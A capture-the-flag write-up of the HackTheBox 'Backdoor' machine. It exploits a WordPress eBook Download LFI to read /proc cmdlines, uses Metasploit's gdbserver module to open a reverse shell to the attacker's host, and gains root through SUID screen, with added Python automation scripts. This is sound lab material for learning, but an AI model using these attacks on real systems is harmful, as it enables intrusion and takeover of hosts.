Overview
TL;DR
  • WordPress eBook Download plugin LFI (exploit-db 39579) used to read /proc/<pid>/cmdline and identify the service on port 1337 as gdbserver; Metasploit's gdb_server_exec then gives a shell as user
  • Root by attaching to a root-owned detached screen session with screen -x root/root, which works because /usr/bin/screen is SUID root

Enumeration

Nmap

$ nmap $ip -p-
Starting Nmap 7.92 ( https://nmap.org ) at 2021-11-22 10:13 +0545
Nmap scan report for 10.129.106.30
Host is up (0.17s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
1337/tcp open waste
Nmap done: 1 IP address (1 host up) scanned in 946.62 seconds

Port 80 hosts WordPress with the eBook Download plugin installed. Its filedownload.php takes a file path in the ebookdownloadurl parameter and returns that file without any validation, i.e. a local file inclusion / directory traversal (exploit-db 39579).

Nmap labels port 1337 "waste" only because that is the /etc/services name for the port; no version scan was run, so the label says nothing about what actually listens there. To identify the service, use the LFI to read /proc/<pid>/cmdline for a range of PIDs with wfuzz. A PID that does not exist returns an 82-byte response (the plugin's fixed wrapper around an empty file), so --hh 82 hides those; the remaining hits are live processes, and their command lines show that the process bound to port 1337 is gdbserver, which the Metasploit module in the next section targets. PIDs 958 and 959 seen here reappear in the ps output during privilege escalation.

$ wfuzz -u 'http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/FUZZ/cmdline' -z range,900-1000 --hh 82
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/FUZZ/cmdline
Total requests: 101
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000041: 200 0 L 1 W 100 Ch "940"
000000054: 200 0 L 1 W 99 Ch "953"
000000059: 200 0 L 12 W 183 Ch "958"
000000060: 200 0 L 11 W 181 Ch "959"
000000047: 200 0 L 1 W 100 Ch "946"
000000046: 200 0 L 1 W 100 Ch "945"
000000083: 200 0 L 3 W 128 Ch "982"
000000078: 200 0 L 8 W 138 Ch "977"
000000084: 200 0 L 1 W 110 Ch "983"
000000101: 200 0 L 1 W 85 Ch "1000"
000000094: 200 0 L 1 W 109 Ch "993"
000000089: 200 0 L 1 W 109 Ch "988"
000000095: 200 0 L 1 W 99 Ch "994"
000000085: 200 0 L 1 W 91 Ch "984"
000000091: 200 0 L 1 W 109 Ch "990"
Total time: 2.496964
Processed Requests: 101
Filtered Requests: 86
Requests/sec.: 40.44911
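The same enumeration as a script, added here as an example and not part of the original writeup. It drives the LFI for a PID range, drops the baseline-sized "no such file" responses the way --hh 82 does, and splits each /proc/<pid>/cmdline into argv. The response layout it assumes (the requested path echoed three times, then the raw file, then <script>window.close()</script>) is an assumption about the plugin's behaviour, consistent with the 82-byte size for a 17-character path and the 85 bytes seen for /proc/1000/cmdline above; the sample responses in the test are constructed.

```python
# Added example (not from the writeup): drive the eBook Download LFI to read
# /proc/<pid>/cmdline and turn the responses into argv lists.
# ASSUMPTION: the plugin echoes the requested path three times, then the file
# content, then "<script>window.close()</script>". That layout matches the
# 82-byte baseline for 17-character paths and 85 bytes for /proc/1000/cmdline.
import urllib.request
from typing import Callable, Dict, List, Optional

LFI_URL = ("http://backdoor.htb/wp-content/plugins/ebook-download/"
           "filedownload.php?ebookdownloadurl=")
TRAILER = b"<script>window.close()</script>"


def baseline_size(requested_path: str) -> int:
    """Response size when the requested file is empty or does not exist."""
    return 3 * len(requested_path) + len(TRAILER)


def extract_file(body: bytes, requested_path: str) -> Optional[bytes]:
    """Strip the echoed path and the trailer; None means an empty or missing file."""
    prefix = requested_path.encode() * 3
    if not (body.startswith(prefix) and body.endswith(TRAILER)):
        raise ValueError("response does not match the expected plugin layout")
    content = body[len(prefix):len(body) - len(TRAILER)]
    return content or None


def cmdline_to_argv(raw: bytes) -> List[str]:
    """/proc/<pid>/cmdline is NUL-separated with a trailing NUL."""
    return [arg.decode(errors="replace") for arg in raw.split(b"\x00") if arg]


def fetch_proc_file(pid: int, name: str = "cmdline", timeout: float = 10) -> bytes:
    """Fetch /proc/<pid>/<name> through the LFI (network; only used from __main__)."""
    with urllib.request.urlopen(LFI_URL + f"/proc/{pid}/{name}", timeout=timeout) as r:
        return r.read()


def enumerate_processes(pids: range,
                        fetch: Callable[[int], bytes]) -> Dict[int, List[str]]:
    """Map live PIDs to argv, skipping baseline-sized responses (what --hh 82 hides)."""
    found: Dict[int, List[str]] = {}
    for pid in pids:
        path = f"/proc/{pid}/cmdline"
        body = fetch(pid)
        if len(body) == baseline_size(path):
            continue
        raw = extract_file(body, path)
        if raw:
            found[pid] = cmdline_to_argv(raw)
    return found


def processes_mentioning(procs: Dict[int, List[str]], needle: str) -> Dict[int, List[str]]:
    """Keep only processes whose argv contains needle, e.g. a port number."""
    return {pid: argv for pid, argv in procs.items() if any(needle in a for a in argv)}


if __name__ == "__main__":
    procs = enumerate_processes(range(900, 1001), fetch_proc_file)
    for pid, argv in processes_mentioning(procs, "1337").items():
        print(pid, " ".join(argv))
```

Reading other /proc entries (environ, maps, cwd's target via the status file) works the same way once the PID is known, and the size filter should be recomputed per path because the echoed path length changes with the PID.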

Initial access

Using Metasploit

$ msfconsole -q
msf6 > search gdb
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/gdb/gdb_server_exec 2014-08-24 great No GDB Server Remote Payload Execution
1 exploit/linux/local/ptrace_sudo_token_priv_esc 2019-03-24 excellent Yes ptrace Sudo Token Privilege Escalation
Interact with a module by name or index. For example info 1, use 1 or use exploit/linux/local/ptrace_sudo_token_priv_esc
msf6 > use 0
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/gdb/gdb_server_exec) > set rhost 10.129.106.30
rhost => 10.129.106.30
msf6 exploit(multi/gdb/gdb_server_exec) > set rport 1337
rport => 1337
msf6 exploit(multi/gdb/gdb_server_exec) > set lhost tun0
lhost => tun0
msf6 exploit(multi/gdb/gdb_server_exec) > set lport 80
msf6 exploit(multi/gdb/gdb_server_exec) > set payload linux/x64/shell_reverse_tcp
payload => linux/x64/shell_reverse_tcp
msf6 exploit(multi/gdb/gdb_server_exec) > run
[*] Started reverse TCP handler on 10.10.14.3:80
[*] 10.129.106.30:1337 - Performing handshake with gdbserver...
[*] 10.129.106.30:1337 - Stepping program to find PC...
[*] 10.129.106.30:1337 - Writing payload at 00007ffff7fd0103...
[*] 10.129.106.30:1337 - Executing the payload...
[*] Command shell session 1 opened (10.10.14.3:80 -> 10.129.106.30:55236) at 2021-11-22 11:42:50 +0545
id
uid=1000(user) gid=1000(user) groups=1000(user)
whoami
user

Privilege Escalation

Misconfigured SUID | SCREEN

/usr/bin/screen is SUID root on this host, and ps shows a root-owned loop that keeps a detached screen session named "root" alive, recreating it whenever /var/run/screen/S-root/ is empty. Because screen runs as root, the unprivileged user can attach to that session with screen -x root/root and land in its root shell. The reverse shell from gdb_server_exec has no controlling terminal, so the first attempt fails with "Must be connected to a terminal"; script /dev/null allocates a pty, after which the attach succeeds.

$ find / -type f -perm /4000 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/at
/usr/bin/su
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/fusermount
/usr/bin/screen
/usr/bin/umount
/usr/bin/mount
/usr/bin/chsh
/usr/bin/pkexec
$ ps -ef | grep -i screen
root 958 946 0 02:17 ? 00:00:05 /bin/sh -c while true;do sleep 1;find /var/run/screen/S-root/ -empty -exec screen -dmS root \;; done
root 1017 1 0 02:17 ? 00:00:00 SCREEN -dmS root
user 34896 34719 0 05:58 ? 00:00:00 grep -i screen
screen -x root/root
Must be connected to a terminal.
script /dev/null
Script started, file is /dev/null
$ screen -x root/root
screen -x root/root
root@Backdoor:~# whoami
whoami
root
root@Backdoor:~# cat /root/root.txt
cat /root/root.txt
5275e6bf9af3a4df290e216f7f92cfb9
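The recognition step above (SUID screen plus a root-owned detached session equals an attachable root shell) as a small triage helper, added here as an example and not part of the original writeup. It parses the find and ps -ef output from this page, embedded below as constructed sample text, and emits the screen -x owner/name command for any detached session owned by another user when /usr/bin/screen is in the SUID list.

```python
# Added example (not from the writeup): spot an attachable root-owned screen
# session from `find / -perm /4000` and `ps -ef` output. The sample text is
# constructed from the outputs shown on this page.
import re
from typing import List, NamedTuple

SUID_OUTPUT = """/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/screen
/usr/bin/pkexec
"""

PS_OUTPUT = r"""root 958 946 0 02:17 ? 00:00:05 /bin/sh -c while true;do sleep 1;find /var/run/screen/S-root/ -empty -exec screen -dmS root \;; done
root 1017 1 0 02:17 ? 00:00:00 SCREEN -dmS root
user 34896 34719 0 05:58 ? 00:00:00 grep -i screen
"""


class Proc(NamedTuple):
    user: str
    pid: int
    ppid: int
    cmd: str


class Session(NamedTuple):
    owner: str
    name: str
    pid: int


# A session started with -dmS shows up as "SCREEN -dmS <name>" (upper case),
# which distinguishes it from the sh loop that merely mentions screen.
SCREEN_RE = re.compile(r"^SCREEN\b.*?-dmS\s+(\S+)")


def parse_ps(text: str) -> List[Proc]:
    """Parse `ps -ef` rows: UID PID PPID C STIME TTY TIME CMD (CMD may contain spaces)."""
    procs: List[Proc] = []
    for line in text.splitlines():
        fields = line.split(None, 7)
        if len(fields) == 8 and fields[1].isdigit():
            procs.append(Proc(fields[0], int(fields[1]), int(fields[2]), fields[7]))
    return procs


def detached_sessions(procs: List[Proc]) -> List[Session]:
    """Detached screen sessions and who owns them."""
    found: List[Session] = []
    for p in procs:
        m = SCREEN_RE.match(p.cmd)
        if m:
            found.append(Session(p.user, m.group(1), p.pid))
    return found


def attach_commands(suid_output: str, procs: List[Proc], me: str) -> List[str]:
    """If screen is SUID root, another user's session is reachable as screen -x owner/name."""
    if "/usr/bin/screen" not in set(suid_output.split()):
        return []
    return [f"screen -x {s.owner}/{s.name}"
            for s in detached_sessions(procs) if s.owner != me]


if __name__ == "__main__":
    for cmd in attach_commands(SUID_OUTPUT, parse_ps(PS_OUTPUT), "user"):
        print(cmd)
```

The fix on the defensive side follows directly from the check: remove the SUID bit from screen (it is not needed for ordinary use) and do not leave root sessions detached on a multi-user host.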